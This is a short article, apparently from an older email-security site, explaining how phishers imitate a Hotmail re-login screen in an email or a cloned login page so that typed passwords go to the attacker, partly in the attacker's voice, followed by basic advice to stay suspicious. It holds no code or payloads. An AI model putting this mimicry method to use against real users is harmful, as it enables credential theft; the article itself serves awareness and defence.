What to get from where
If we want to obtain something we need at least a vague idea of what that is and where we can get it.
Let's assume that we want to gain access to a system protected with a password. One way, an elegant way, to get into the system is to obtain the password. So the password is what we want.
Now we need to find out where to get the password from. Let's also assume that the person who issued the password, the password holder is able to reproduce it if necessary.
How to get it
Under which circumstances will she be willing, eager even to give away that precious phrase?
Right. Whenever the password is needed to access the protected system she will issue it without suspicion and actually believing she is doing something right. Of course she will have a more or less precise idea of the environment where it is not only required but also "safe" to enter the password.
Our goal thus is to emulate this environment as exactly as possible.
How it Works
When a Hotmail session has been idle for some time, for example, the user is automatically logged out and upon a request to access her account has to re-login.
If this re-login screen is emulated in an email, what is intended to be a security feature turns into a security risk. You type in the password to log into Hotmail again, but the password is silently sent to the password phisher instead.
Of course, a web-based email's log-in screen could also be replaced with an exact copy that sends the user name and password to the password thief instead of (or in addition to) logging you in.
How to Stop it
Unfortunately, no fool-proof way to prevent a mimicry attack seems to exist and no "fix" is actually possible (there is nothing "broken"). All we can do is be alert and make imitating the login-process more difficult.
You can increase your email's security by
- being generally suspicious and
- thinking two times before you type any password anywhere.